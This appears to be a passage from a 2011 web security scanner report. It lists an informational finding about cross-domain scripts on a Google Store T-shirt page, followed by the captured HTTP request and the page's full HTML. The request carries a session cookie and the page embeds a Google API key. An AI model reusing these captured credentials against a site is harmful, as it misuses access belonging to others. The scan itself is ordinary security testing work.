<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUENTM4MQ9kFgJmD2QWAgIDD2QWAgIFD2QWAmYPZBYCAgEPZBYCAgMPDxYCHghJbWFnZVVybAUWL2ltYWdlcy9idG5fc2lnbnVwLmdpZmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBShUZW1wbGF0ZSRjdGxSaWdodE5hdiRjdGxTaWdudXAkYnRuU2lnblVw" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwL5t4CVDgKc3s3hCgKHlcOwBw==" />
</div>
<input name="Template$ctlRightNav$ctlSignup$EmailAddress" type="text" maxlength="50" id="Template_ctlRightNav_ctlSignup_EmailAddress" class="signup-tb" />
<input type="image" name="Template$ctlRightNav$ctlSignup$btnSignUp" id="Template_ctlRightNav_ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" />
</form>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round">
<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>
<div class="center-content">
<ul class="store-links">
<li><a href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (0)</a></li>

<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>

</ul>

<ul>

<li><a href="/googlesearch.aspx?topseller=yes">Top Sellers</a></li>
<li><a href="/googlesearch.aspx?isnew=yes">What's New</a></li>
<li><a href="/googlesearch.aspx?category=eco">Eco-Friendly Items</a></li>
<li><a href="/googlesearch.aspx?specials=yes">Specials</a></li>
<li><a href="/Mini/"><b>Google Mini</b></a></li>

</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '7208';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
    </div>
    <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");
</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
var ga = ga || {};
ga.special = 'regular';

ga.isNew = 'no';

firstTracker._setCustomVar(1, 'price', ga.special, 3);
firstTracker._setCustomVar(2, 'is new', ga.isNew, 3);
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();

</script>

<div id="backgroundPopup"></div>

   </body>
</html>

4.8. http://www.googlestore.com/Wearables/Tiki+Android+T-Shirt.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/Wearables/Tiki+Android+T-Shirt.axd

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js
https://www.google.com/cse/intl/en-US/sayt.js
https://www.google.com/jsapi

Request

GET /Wearables/Tiki+Android+T-Shirt.axd HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/googlesearch.aspx?category=New
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.51.9.1319224888597; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SupportCookies=true

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35548
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 19:25:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Tiki Android T-Shirt</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
       <meta name='keywords' content='' />
       <meta name='description' content='' />

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
    <link href="/css/main.css" rel="stylesheet" type="text/css" />
    <link href="/css/home.css" rel="stylesheet" type="text/css" />
    
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

<script type="text/javascript">
function click(theevent){
try{
firstTracker._trackEvent('product_page', theevent);
}catch(err){ }
}
</script>
   </head>
<body>
<div id="wrapper">
    <div id="header" style="height:70px">




        <a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a>

    <div style="width:100%;position:absolute; top:0; right:0px; width:90px; height:52px;">
    <a href="/You+Tube/"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>
    </div>

    <ul>
    <li><a href="/You+Tube/">You Tube Home</a></li>
    <li><a href="http://www.google.com">Google Search</a></li>
    <li><a href="http://www.google.com/about.html">About Google</a></li>
    </ul>

    </div>

<div id="left_content">



<div class="box-round">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
</li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href=/googlesearch.aspx?category=accessories >Accessories</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href=/googlesearch.aspx?category=fun >Fun</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href=/googlesearch.aspx?category=kids >Kids</a></li><li class="nav off" style="position:relative;"><a class="main" style="background:url(/images/category_icons/office_off.gif) left no-repeat;" href=/googlesearch.aspx?category=office >Office</a></li><li class="nav on" style="position:relative;"><a class="main" style="background:url(/images/category_icons/wearables_on.gif) left no-repeat;" href=/googlesearch.aspx?category=wearables >Wearables</a><ul class="item_list"><li><a class="product_on" href="/Wearables/Tiki+Android+T-Shirt.axd">Tiki Android T-Shirt</a></li><li><a href="/Wearables/Google+Wallet+Full-Zip+Hoodie.axd">Google Wallet Full-Zip Hoodie</a></li><li><a href="/Wearables/Google+Circles+T-Shirt+White.axd">Google+ Circles T-Shirt White</a></li><li><a href="/Wearables/Google+Circles+T-shirts+Navy.axd">Google+ Circles T-shirts Navy</a></li><li><a href="/Wearables/Ladies+Full+Zip+Hoodie+with+Woman+s+Logo.axd">Ladies' Full Zip Hoodie with Woman's Logo</a></li><li><a href="/Wearables/Android+Concert+T-Shirt.axd">Android Concert T-Shirt</a></li><li><a href="/Wearables/Ladies+Glow+in+the+Dark+Ink+Tee.axd">Ladies Glow in the Dark Ink Tee</a></li><li><a href="/Wearables/Ladies+Lite+Color-Block+Jacket.axd">Ladies Lite Color-Block Jacket</a></li><li><a href="/Wearables/Gmail+Cap.axd">Gmail Cap</a></li><li><a href="/Wearables/Go+Gopher+T-Shirt.axd">Go Gopher T-Shirt</a></li><li><a href="/Wearables/Google+TV+T-Shirt.axd">Google TV T-Shirt</a></li><li><a href="/Wearables/Gmail+Full+Zip+Fleece.axd">Gmail Full Zip Fleece</a></li><li><a href="/Wearables/Honeycomb+Navy+T-Shirt.axd">Honeycomb Navy T-Shirt</a></li><li><a href="/Wearables/Honeycomb+White+T-Shirt.axd">Honeycomb White T-Shirt</a></li><li><a href="/Wearables/Google+Earth+Tee.axd">Google Earth Tee</a></li><li><a href="/Wearables/Android+Dragon+T-Shirt.axd">Android Dragon T-Shirt</a></li><li><a href="/Wearables/Champion+Polyester+Mesh+Shorts.axd">Champion Polyester Mesh Shorts</a></li><li><a href="/Wearables/Organic+Cotton+Android+walking+with+dog+T-shirt.axd">Organic Cotton Android walking with dog T-shirt</a></li><li><a href="/Wearables/Flexfit+Cap+L+XL+-+Dark+Grey.axd">Flexfit Cap L/XL - Dark Grey</a></li><li><a href="/Wearables/Gmail+Tuxedo+Tee.axd">Gmail Tuxedo Tee</a></li><li><a href="/Wearables/Men+s+4+oz+Triblend+T-Shirt.axd">Men's 4 oz. Triblend T-Shirt</a></li><li><a href="/Wearables/Men+s+Lombard+Thermal+T-Shirt.axd">Men's Lombard Thermal T-Shirt</a></li><li><a href="/Wearables/Ladies+Black+is+Back+T-Shirt.axd">Ladies Black is Back T-Shirt</a></li><li><a href="/Wearables/Long+Sleeve+Organic+Cotton+T-shirt.axd">Long Sleeve Organic Cotton T-shirt</a></li><li><a href="/Wearables/Ladies+Bella+Favorite+T-Shirt+in+4+colors.axd">Ladies Bella Favorite T-Shirt in 4 colors</a></li><li><a href="/Wearables/Men+s+Lite+Color-Block+Jacket.axd">Men's Lite Color-Block Jacket</a></li><li><a href="/Wearables/Ladies+Bella+V-Neck+T-Shirt.axd">Ladies Bella V-Neck T-Shirt</a></li><li><a href="/Wearables/Canvas+3+Button+Polo.axd">Canvas 3 Button Polo</a></li><li><a href="/Wearables/Triblend+Full+Zip+Hoodie.axd">Triblend Full Zip Hoodie</a></li><li><a href="/Wearables/Structured+Low+Profile+6+Panel+Cap.axd">Structured Low Profile 6 Panel Cap</a></li><li><a href="/Wearables/Chrome+Visor.axd">Chrome Visor</a></li><li><a href="/Wearables/Peninsula+Jacket.axd">Peninsula Jacket</a></li><li><a href="/Wearables/Flexfit+Cap+S+M+-+Dark+Grey.axd">Flexfit Cap S/M - Dark Grey</a></li><li><a href="/Wearables/Men+s+Burst+T-Shirt.axd">Men's Burst T-Shirt</a></li><li><a href="/Wearables/Ladies+Burst+T-Shirt.axd">Ladies' Burst T-Shirt</a></li><li><a href="/Wearables/Flip+Flops.axd">Flip Flops</a></li><li><a href="/Wearables/AA+Full+Zip+Hooded+Jacket+with+Gmail+Logo.axd">AA Full Zip Hooded Jacket with Gmail Logo</a></li><li><a href="/Wearables/Android+Cap.axd">Android Cap</a></li><li><a href="/Wearables/Google+Maps+Biking+T-Shirt.axd">Google Maps Biking T-Shirt</a></li><li><a href="/Wearables/Android+Skateboarder+T-Shirt.axd">Android Skateboarder T-Shirt</a></li><li><a href="/Wearables/Android+Restroom+Sign+T-Shirt.axd">Android Restroom Sign T-Shirt</a></li><li><a href="/Wearables/Ladies+Android+Pride+T-Shirt+-+Black.axd">Ladies' Android Pride T-Shirt - Black</a></li><li><a href="/Wearables/Android+Pride+T-Shirt+-+Black.axd">Android Pride T-Shirt - Black</a></li><li><a href="/Wearables/Sport-Tech+Fleece+Hoodie.axd">Sport-Tech Fleece Hoodie</a></li><li><a href="/Wearables/Anvil+Full+Zip+Organic+Hoodie.axd">Anvil Full Zip Organic Hoodie</a></li><li><a href="/Wearables/Alo+Ladies+Half-Zip+Pullover.axd">Alo Ladies Half-Zip Pullover</a></li><li><a href="/Wearables/Ladies+Soft+Shell+Jacket-Red.axd">Ladies Soft Shell Jacket-Red</a></li><li><a href="/Wearables/Unisex+1+4+Zip+Fleece.axd">Unisex 1/4 Zip Fleece</a></li><li><a href="/Wearables/Long+Sleeve+Organic+Crew.axd">Long Sleeve Organic Crew</a></li><li><a href="/Wearables/Full+Zip+Men+s+Fleece.axd">Full Zip Men's Fleece</a></li><li><a href="/Wearables/Ladies+Full+Zip+Fleece.axd">Ladies Full Zip Fleece</a></li><li><a href="/Wearables/Ladies+Thermal+Shirt.axd">Ladies Thermal Shirt</a></li><li><a href="/Wearables/Google+Voice+Fleece+Hoodie.axd">Google Voice Fleece Hoodie</a></li><li><a href="/Wearables/Google+Voice+T-shirt.axd">Google Voice T-shirt</a></li><li><a href="/Wearables/Tribeca+Full+Zip+Hoodie.axd">Tribeca Full Zip Hoodie</a></li><li><a href="/Wearables/Ladies+Android+Heart+T-Shirt.axd">Ladies Android Heart T-Shirt</a></li><li><a href="/Wearables/Ladies+Organic+Tee+-+Black.axd">Ladies' Organic Tee - Black</a></li><li><a href="/Wearables/Beanie+-+Navy+with+Ivory.axd">Beanie - Navy with Ivory</a></li><li><a href="/Wearables/Pro+Mesh+Cap+-+Black.axd">Pro Mesh Cap - Black</a></li><li><a href="/Wearables/Sport-Tek+Track+Jacket.axd">Sport-Tek Track Jacket</a></li><li><a href="/Wearables/Organic+Cotton+Long+Sleeve+T-Shirt.axd">Organic Cotton Long Sleeve T-Shirt</a></li><li><a href="/Wearables/Organic+Black+is+Back+T-Shirt.axd">Organic Black is Back T-Shirt</a></li><li><a href="/Wearables/Organic+Basic+T-Shirt.axd">Organic Basic T-Shirt</a></li><li><a href="/Wearables/Organic+Cotton+T-Shirt+-+Red.axd">Organic Cotton T-Shirt - Red</a></li><li><a href="/Wearables/Organic+Cotton+T-Shirt+-+Grey.axd">Organic Cotton T-Shirt - Grey</a></li><li><a href="/Wearables/Android+American+Apparel+Polo.axd">Android American Apparel Polo</a></li><li><a href="/Wearables/Organic+Cotton+Contrast+Stitch+Cap.axd">Organic Cotton Contrast Stitch Cap</a></li><li><a href="/Wearables/American+Apparel+Google+Polo.axd">American Apparel Google Polo</a></li><li><a href="/Wearables/Organic+Cotton+Basic+Crew+-+Unisex.axd">Organic Cotton Basic Crew - Unisex</a></li><li><a href="/Wearables/Chrome+T-Shirt.axd">Chrome T-Shirt</a></li><li><a href="/Wearables/Ladies+Bamboo+Tee.axd">Ladies Bamboo Tee</a></li><li><a href="/Wearables/Organic+Cotton+Cap+-+Black.axd">Organic Cotton Cap - Black</a></li><li><a href="/Wearables/Ladies+Soft+Shell+Hooded+Jacket.axd">Ladies Soft Shell Hooded Jacket</a></li><li><a href="/Wearables/Organic+Beanie.axd">Organic Beanie</a></li><li><a href="/Wearables/Men+s+Puffy+Vest.axd">Men's Puffy Vest</a></li><li><a href="/Wearables/Men+s+Bike+Jersey+-+Rasta.axd">Men's Bike Jersey - Rasta</a></li><li><a href="/Wearables/Men+s+Bike+Jersey+-+Android.axd">Men's Bike Jersey - Android</a></li><li><a href="/Wearables/Ladies+Bike+Jersey+-+Rasta.axd">Ladies Bike Jersey - Rasta</a></li><li><a href="/Wearables/Ladies+Bike+Jersey+-+Android.axd">Ladies Bike Jersey - Android</a></li><li><a href="/Wearables/Men+s+Akasha+Jacket.axd">Men's Akasha Jacket</a></li><li><a href="/Wearables/Google+Map+T-Shirt.axd">Google Map T-Shirt</a></li><li><a href="/Wearables/Men+s+Plasma+Schell+Jacket.axd">Men's Plasma Schell Jacket</a></li><li><a href="/Wearables/Classic+Men+s+Bib+Shorts+-+Android.axd">Classic Men's Bib Shorts - Android</a></li><li><a href="/Wearables/Classic+Men+s+Shorts+-+Android.axd">Classic Men's Shorts - Android</a></li><li><a href="/Wearables/Classic+Men+s+Bib+Shorts+-+Rasta.axd">Classic Men's Bib Shorts - Rasta</a></li><li><a href="/Wearables/Classic+Men+s+Shorts+-+Rasta.axd">Classic Men's Shorts - Rasta</a></li><li><a href="/Wearables/Classic+Ladies+Bib+Shorts+-+Android.axd">Classic Ladies Bib Shorts - Android</a></li><li><a href="/Wearables/Classic+Ladies+Shorts+-+Android.axd">Classic Ladies Shorts - Android</a></li><li><a href="/Wearables/Classic+Ladies+Bib+Shorts+-+Rasta.axd">Classic Ladies Bib Shorts - Rasta</a></li><li><a href="/Wearables/Classic+Ladies+Shorts+-+Rasta.axd">Classic Ladies Shorts - Rasta</a></li></ul></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>
<div id="content">

<script type="text/javascript" src="/js/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="/js/addtl.js"></script>
<link rel="stylesheet" href="/css/popup.css" />

<style type="text/css">
.search_top
{
    font-size:15px;
    margin-bottom:15px;
}
.search_top select{ font-size:13px;}
</style>

<div class="search_top">

<form action="/googlesearch.aspx" id="search" method="get">
<b>Search:</b>
<select name="category">

<option value="all">All Products</option>
<option value="eco" >Eco-Friendly</option>
<option value="wearables" >Wearables</option>
<option value="youtube" >You Tube</option>
<option value="accessories" >Accessories</option>
<option value="office" >Office</option>
<option value="doodles" >Doodles</option>
<option value="kids" >Kids</option>
<option value="fun" >Fun</option>
<option value="apps" >Apps</option>
</select>

<input name="q" id="q" autocomplete="off" class="searchbox" style="width:280px; color:#333;" value="keyword / item #" autocomplete="off" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" type="text"/>
<input type="image" src="/images/btn_search.gif" class="button" value="search" />
</form>

</div>
<div id="product">

<h1>Wearables</h1>

<div id="breadcrumbs_only">

<a href="http://www.googlestore.com/shop.axd/Home">Home</a> <span>/</span>

<a href="/Wearables/">Wearables</a>
</div>
   <div id="product_info">

<script type="text/javascript" src="/js/style.js"></script>
<script type="text/javascript">
var styleProducts = new Array();
var styleDescriptions = new Array();

function addToWishList(frmName)
{
   var frm = document.forms[frmName];
   frm.action = '/shop.axd/AddToWishList';
   frm.submit();
}

function swatchImageClick(color)
{
   var fld = document.forms['frmProductDetails']['l2desc'];

   for(i = 0; i < fld.options.length; i++)
   {
       if (fld.options[i].value == color)
       {
           fld.selectedIndex = i;
           break;
       }
   }

   styleOnChange('frmProductDetails', '','10 13119 ', 2, 2, true);
}
</script>

<form action="/shop.axd/AddToCartBP" method="post" name="frmProductDetails">
<table border="0" cellpadding="10" cellspacing="0" width="100%" class="product_table">
<tr>
   <td valign="top" width="200">

<div id="product-image-wrap">
<a id="ProductImageHref" onclick="click('Enlarge Image')" style="text-decoration:none;" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2f10-13119.jpg&edp_no=23922',420,600)">
<img id="ProductImage" width="225px" src="/content/images/standard/10-13119a.jpg" alt="" />
</a>
<img class="ecotags" src="/images/greeninitiative/organic_s.jpg" title="Made from materials grown without the use of harmful synthetic chemicals.">
<img class="newicon" src="/images/newitem.gif" alt="New Item" title="New Item">

<div style="position:relative; overflow:hidden; width:215px">
<a style="float:left;" onclick="click('Enlarge Image')" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2f10-13119.jpg&edp_no=23922',420,600)" class="enlarge">Enlarge image</a>

</div>
</div>

<span class='mhead' style='background:#FFF;'>Mouseover image to view</span><ul id="multiple"><li><a id="/content/Images/Large/10-13119-Back.jpg" style="border:1px solid #FFF;" href="javascript:newWindow('/view_large.aspx?img=%2fcontent%2fimages%2flarge%2f10-13119.jpg&edp_no=23922',420,600)"><img id="0" style="border:1px solid #eee;" src="/content/Images/SuperThumb/10-13119-BackC.jpg" alt=""></a><img id="i0" src="/content/Images/Standard/10-13119-BackA.jpg" style="display:none;" /></li></ul>

<script type="text/javascript">

var mainSrc = $("#ProductImage").attr("src");
$("#multiple li a").bind("mouseenter", function(e){
$(this).css("border","1px solid #eee");
var ssrc = $(this).children("img").attr("src");
var inum = $(this).children("img").attr("id");
var medSrc = $("#i" + inum).attr("src");
if(medSrc == undefined){
medSrc = ssrc.replace("C.jpg","A.jpg");
}
$("#ProductImage").attr("src",medSrc);

});

$("#multiple li a").bind("mouseleave", function(e){
$(this).css("border","1px solid #FFF");
});

$("#multiple").bind("mouseleave", function(e){
$("#ProductImage").attr("src","/content/images/standard/10-13119a.jpg");
});
</script>

</td>
        <td valign="top" class="product_details">
<h2>Tiki Android T-Shirt</h2>
        <b>Item #:</b> 10 13119<br /><br />
<p class="blocktext">Inspired by sun, surf, and sand, the Tiki Droid shirt is an easy way to transport yourself to a summer beach in style. This fun Android design is printed on a 100% organic cotton t-shirt in white. Design on the front and back yoke.  <font class="Apple-style-span" color="#ff0000">**Limited run.  Available while supplies last.**</font></p>

        <div class="price">
<b>Price:</b> $27.60
</div>







<div class="product_colors">
<b>Available Colors:</b><br />
<ul>

                        <li>
                        <a href="javascript:swatchImageClick('GREY');void(0);"><img style="border:1px solid #CCC;" src="/images/catalog/swatch/GREY.jpg" alt="GREY" width="20" height="20" border="0"></a>
                           </li>

</ul>
</div>

<table cellpadding="0" cellspacing="0">
<tr>
            <td colspan="2">

<script type="text/javascript" src="/js/prototype/style.js"></script>
<script lang="javascript">
styleProducts['10 13119 '] = new Array();

styleProducts['10 13119 '][0] = new Array("XS","GREY","GREY", "$27.60" , "24", " In stock");

styleProducts['10 13119 '][1] = new Array("S","GREY","GREY", "$27.60" , "23", " In stock");

styleProducts['10 13119 '][2] = new Array("M","GREY","GREY", "$27.60" , "21", " In stock");

styleProducts['10 13119 '][3] = new Array("L","GREY","GREY", "$27.60" , "25", " In stock");

styleProducts['10 13119 '][4] = new Array("XL","GREY","GREY", "$27.60" , "9", " In stock");

styleProducts['10 13119 '][5] = new Array("2XL","GREY","GREY", "$31.00" , "1", " In stock");

styleDescriptions['10 13119 '] = new Array();

styleDescriptions['10 13119 '][1] = 'Size';

styleDescriptions['10 13119 '][2] = 'Color';

</script>

<table cellpadding="0" cellspacing="0" id="style_controls">
<tr>

<td><b>Size</b></td>

<td><b>Color</b></td>

<td><b>Qty</b></td>
</tr>
<tr>

<td><select id="" class="l1desc" name="l1desc" onchange="changeStyleMessage('frmProductDetails', 'l1desc','10 13119 ', 1, 2, true)">

<option id="" value="XS" selected>XS</option>

<option id="" value="S">S</option>

<option id="" value="M">M</option>

<option id="" value="L">L</option>

<option id="" value="XL">XL</option>

<option id="" value="2XL">2XL</option>

</select>
</td>

<td><select id="" class="l2desc" name="l2desc" onchange="changeStyleMessage('frmProductDetails', 'l2desc','10 13119 ', 2, 2, true)">

<option id="" value="GREY" selected>GREY - $27.60</option>

</select>
</td>

<td>
<select name="qty">

<option>0</option>

<option selected>1</option>

<option>2</option>

<option>3</option>

<option>4</option>

<option>5</option>

<option>6</option>

<option>7</option>

<option>8</option>

<option>9</option>

<option>10</option>

<option>11</option>

<option>12</option>

<option>13</option>

<option>14</option>

<option>15</option>

<option>16</option>

<option>17</option>

<option>18</option>

<option>19</option>

<option>20</option>

<option>21</option>

<option>22</option>

<option>23</option>

<option>24</option>

<option>25</option>

<option>26</option>

<option>27</option>

<option>28</option>

<option>29</option>

<option>30</option>

<option>31</option>

<option>32</option>

<option>33</option>

<option>34</option>

<option>35</option>

<option>36</option>

<option>37</option>

<option>38</option>

<option>39</option>

<option>40</option>

<option>41</option>

<option>42</option>

<option>43</option>

<option>44</option>

<option>45</option>

<option>46</option>

<option>47</option>

<option>48</option>

<option>49</option>

<option>50</option>

<option>51</option>

<option>52</option>

<option>53</option>

<option>54</option>

<option>55</option>

<option>56</option>

<option>57</option>

<option>58</option>

<option>59</option>

<option>60</option>

<option>61</option>

<option>62</option>

<option>63</option>

<option>64</option>

<option>65</option>

<option>66</option>

<option>67</option>

<option>68</option>

<option>69</option>

<option>70</option>

<option>71</option>

<option>72</option>

<option>73</option>

<option>74</option>

<option>75</option>

<option>76</option>

<option>77</option>

<option>78</option>

<option>79</option>

<option>80</option>

<option>81</option>

<option>82</option>

<option>83</option>

<option>84</option>

<option>85</option>

<option>86</option>

<option>87</option>

<option>88</option>

<option>89</option>

<option>90</option>

<option>91</option>

<option>92</option>

<option>93</option>

<option>94</option>

<option>95</option>

<option>96</option>

<option>97</option>

<option>98</option>

<option>99</option>

<option>100</option>

</select>
</td>
</tr>

<tr><td colspan="5"><span id="inventoryStatusMessage">
Select your Color/Size Combination
</span></td></tr>

</table>
<br /><br />

            </td>
        </tr>
        <tr>
            <td></td>
            <td>

<table cellpadding="0" cellspacing="0">
<tr>
<td align="left">

<a href="http://www.googlestore.com/Wearables/cid=447/shop.axd/Category"><img src="/images/btn_continueshopping.gif" border=0></a>


  

<input name="imageField" type="image" src="/images/btn_addtocart.gif" onclick="click('Add To Cart')" border="0" />

</td>
</tr>
</table>
</td>
</tr>
    </table>
   </td>
</tr>
</table>
   <input type="hidden" name="type" value="S">

<input type="hidden" name="cid" value="447">

<input type="hidden" name="style_id" value="10 13119 ">
<input type="hidden" name="edp_no" value="23922">

</form>

<br />
<b class="b_header">You may also like...</b>
<div id="cross_sells">
<ul>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Android Dragon T-Shirt : Tiki Android T-Shirt');" href="/Wearables/Android+Dragon+T-Shirt.axd"><img src="/content/images/thumb/10-13112b.jpg" alt="Android Dragon T-Shirt" /></a>
<div class="price">
<b>Price:</b> $13.35
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Android Dragon T-Shirt : Tiki Android T-Shirt');" href="/Wearables/Android+Dragon+T-Shirt.axd">Android Dragon T-Shirt</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Honeycomb Navy T-Shirt : Tiki Android T-Shirt');" href="/Wearables/Honeycomb+Navy+T-Shirt.axd"><img src="/content/images/thumb/10-13107b.jpg" alt="Honeycomb Navy T-Shirt" /></a>
<div class="price">
<b>Price:</b> $14.00
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Honeycomb Navy T-Shirt : Tiki Android T-Shirt');" href="/Wearables/Honeycomb+Navy+T-Shirt.axd">Honeycomb Navy T-Shirt</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Honeycomb White T-Shirt : Tiki Android T-Shirt');" href="/Wearables/Honeycomb+White+T-Shirt.axd"><img src="/content/images/thumb/10-13108b.jpg" alt="Honeycomb White T-Shirt" /></a>
<div class="price">
<b>Price:</b> $13.60
</div>

<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkClick/Honeycomb White T-Shirt : Tiki Android T-Shirt');" href="/Wearables/Honeycomb+White+T-Shirt.axd">Honeycomb White T-Shirt</a>
</li>

<li>
<a onclick="javascript:secondTracker._trackPageview('/RelatedProductLinkImageClick/Android Pride T-Shirt - Black : Tiki Android T-Shirt');" href="/Wearables/Android+Pride+T-Shirt+-+Black.axd"><img src="/content/images/thumb/10-13066b.jpg" alt="Android Pride T-Shirt - Black" /></a>
<div class="price">
<b>Price:</b> $17.40
</div>

